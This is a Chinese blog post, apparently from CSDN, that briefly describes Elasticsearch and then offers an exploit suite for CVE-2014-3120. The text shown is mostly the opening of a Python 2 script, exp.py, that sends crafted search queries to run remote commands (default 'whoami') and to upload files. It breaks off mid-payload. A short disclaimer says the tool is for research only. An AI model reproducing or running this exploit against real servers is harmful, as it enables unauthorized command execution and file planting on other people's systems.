elasticsearch 漏洞利用工具套装_elasticsearch漏洞检测工具-优快云博客

本文介绍了ElasticSearch，一个基于Lucene的开源、分布式搜索引擎，强调其在云计算中的实时搜索、高稳定性及易用性。文章还提及了一个支持HTTP JSON数据索引的漏洞利用工具套装，包括exp.py和check.py，但警告读者仅限于合法的漏洞研究，避免非法使用，并提醒可能的法律责任。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

ElasticSearch是一个基于Lucene构建的开源，分布式，RESTful搜索引擎。设计用于云计算中，能够达到实时搜索，稳定，可靠，快速，安装使用方便。支持通过HTTP使用JSON进行数据索引。

请勿用于非法用途，只供漏洞研究之用

因该脚本造成法律问题，作者概不负责，如果违反相关规定，请通知管理员删除该文章

exp:post提交支持文件上传功能

exp.py

#!/usr/bin/env python
# by heshang ha.cker@me.com
# -*- coding: utf-8 -*-

import httplib
import urllib,urllib2
import simplejson
import string
import sys
from optparse import OptionParser

print 'Elasticsearch ExpLoit By Heshang'
print '                         2014-06-23'
options = OptionParser(usage='%prog ip [port] [command]', description='elasticsearch command exec exploit(CVE-2014-3120)')
options.add_option('-p', '--port', type='int', default='9200',help='The elasticsearch port (default:9200)')
options.add_option('-c', '--cmd', type='str', default='whoami', help='command to test (default:whoami)')
options.add_option('-P', '--path',type='str', default='', help='Upload file\'s path')

def post(ip,port,exp):
    ip=ip
    port=port
    path=''
    exp=exp
    data = {
     
    "size": 1,
    "query": {
     
        "filtered": {
     
            "query":